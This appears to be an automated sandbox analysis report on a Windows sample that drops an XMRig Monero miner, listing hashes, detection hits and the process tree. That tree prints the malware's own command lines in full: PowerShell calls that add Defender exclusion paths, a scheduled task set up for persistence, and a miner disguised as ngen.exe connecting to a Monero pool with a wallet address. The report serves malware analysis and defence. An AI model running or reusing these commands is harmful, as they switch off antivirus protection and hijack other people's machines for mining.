Analysis
-
max time kernel
52s -
max time network
111s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
04/07/2023, 21:24
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230703-en
General
-
Target
file.exe
-
Size
2.3MB
-
MD5
cdce958317e838eb09ec7e678ba1995c
-
SHA1
30d5a9b4f1083e2f188b7ce2d2c24fd63c0b413b
-
SHA256
9dca904c03551d33f96618bae69cb43811bd5072826ead4e1b7072229451a376
-
SHA512
79e021418a99c5ed38a0995887b9bd7711bbe9b299113c76a87f02eb111c9211c350b7d5b2580ca40a81bd110d53a899a11c4b9e61e3338b90ac4ab84dae81f2
-
SSDEEP
49152:OlJiXsQqb2AkydMeCL9+feqU9QWsNNHrT:OH7dj3O8mqkQNNHrT
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/2836-123-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-124-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-125-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-126-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-127-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-128-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-129-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-130-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-132-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2836-134-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 2420 ELRX.exe -
Loads dropped DLL 1 IoCs
pid Process 2128 cmd.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2500 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2224 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2340 powershell.exe 2344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3064 file.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 2420 ELRX.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3064 wrote to memory of 2340 3064 file.exe 28 PID 3064 wrote to memory of 2340 3064 file.exe 28 PID 3064 wrote to memory of 2340 3064 file.exe 28 PID 3064 wrote to memory of 2344 3064 file.exe 29 PID 3064 wrote to memory of 2344 3064 file.exe 29 PID 3064 wrote to memory of 2344 3064 file.exe 29 PID 3064 wrote to memory of 2128 3064 file.exe 32 PID 3064 wrote to memory of 2128 3064 file.exe 32 PID 3064 wrote to memory of 2128 3064 file.exe 32 PID 2128 wrote to memory of 2224 2128 cmd.exe 34 PID 2128 wrote to memory of 2224 2128 cmd.exe 34 PID 2128 wrote to memory of 2224 2128 cmd.exe 34 PID 2128 wrote to memory of 2420 2128 cmd.exe 35 PID 2128 wrote to memory of 2420 2128 cmd.exe 35 PID 2128 wrote to memory of 2420 2128 cmd.exe 35 PID 2420 wrote to memory of 272 2420 ELRX.exe 36 PID 2420 wrote to memory of 272 2420 ELRX.exe 36 PID 2420 wrote to memory of 272 2420 ELRX.exe 36 PID 2420 wrote to memory of 2056 2420 ELRX.exe 37 PID 2420 wrote to memory of 2056 2420 ELRX.exe 37 PID 2420 wrote to memory of 2056 2420 ELRX.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC9A6.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2224
-
-
C:\ProgramData\CodeShorts\ELRX.exe"C:\ProgramData\CodeShorts\ELRX.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵PID:272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵PID:2056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"4⤵PID:2792
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"5⤵
- Creates scheduled task(s)
PID:2500
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl4⤵PID:2836
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
454.8MB
MD5fc3a940f31e120d3647eea5464d74e5e
SHA162eed506d02e5ed69b45fa8262c5515ba76d808a
SHA2564dbdb7dce3e2d343ec68f73db4e28e8e9cae1b4b23bf11a232aa68b952ba12b1
SHA51272f4ccd7b43cd4af9be5c55efcccf825f72dd75dfe6085ef63a04c4c1907ddde113a2155fbe17e741a7b3460d45a4616e999c8de668c0390d2d8b6c0f956613f
-
Filesize
474.7MB
MD5bd83c81b8aad4f15a80769a6cae57c6c
SHA158372e858c4283e89f5a70c8ac320b098ccb4a10
SHA25619b61bc2efe992821b6330651ed1962348e8f3eff96ae84b73ca012f733f7e1d
SHA5122a7678de13858319dcbc4ddf51be0fa960428615ea901d650dbabb3913d119bea18f196d1e619d24f40af4ca56446a3085edd5bc71ef15592a8f39364699889a
-
Filesize
143B
MD53e08c7e072304c9a7396e60232786cfb
SHA18e263d24d0aa0018b1fd4638dd8d412e1f5dbb7b
SHA2565356f4c007b0fb69e585d50255ede6fe018e592cd12a9631fac5798e423b2903
SHA5129ca4cfa0d21fffd787eddc324f05e8035b2ae0b0c11def07f7cc98d1fd2707a79db316b2355ce43a1bfadc1acd1043b05d2d4a3bb4f422c24306d8a36fe41994
-
Filesize
143B
MD53e08c7e072304c9a7396e60232786cfb
SHA18e263d24d0aa0018b1fd4638dd8d412e1f5dbb7b
SHA2565356f4c007b0fb69e585d50255ede6fe018e592cd12a9631fac5798e423b2903
SHA5129ca4cfa0d21fffd787eddc324f05e8035b2ae0b0c11def07f7cc98d1fd2707a79db316b2355ce43a1bfadc1acd1043b05d2d4a3bb4f422c24306d8a36fe41994
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD538f0bb9781dfaaf163451ef776d7c653
SHA112e1a8022feb5efe1c6ef7d4a3c113c0685f6ece
SHA2562e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35
SHA512b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD538f0bb9781dfaaf163451ef776d7c653
SHA112e1a8022feb5efe1c6ef7d4a3c113c0685f6ece
SHA2562e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35
SHA512b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD538f0bb9781dfaaf163451ef776d7c653
SHA112e1a8022feb5efe1c6ef7d4a3c113c0685f6ece
SHA2562e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35
SHA512b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VEQW1HSWJ0HCS79ZSN9X.temp
Filesize7KB
MD538f0bb9781dfaaf163451ef776d7c653
SHA112e1a8022feb5efe1c6ef7d4a3c113c0685f6ece
SHA2562e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35
SHA512b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3
-
Filesize
456.7MB
MD568bd36b878d0844c77183077da155042
SHA1b687ea543dc337e98cea8240f4fab67d59bb07d0
SHA25679b92404c90f4219182b12432756799321eeb3c5602995ecfb157a21d747a971
SHA512b5307210931c0845bda81f661ecc771915b387d0163a6d6efbdd60175657912131456b796f9c20ebcf7b50c3a6074fe98ae6b6457078f52850d42f4297ff6a0f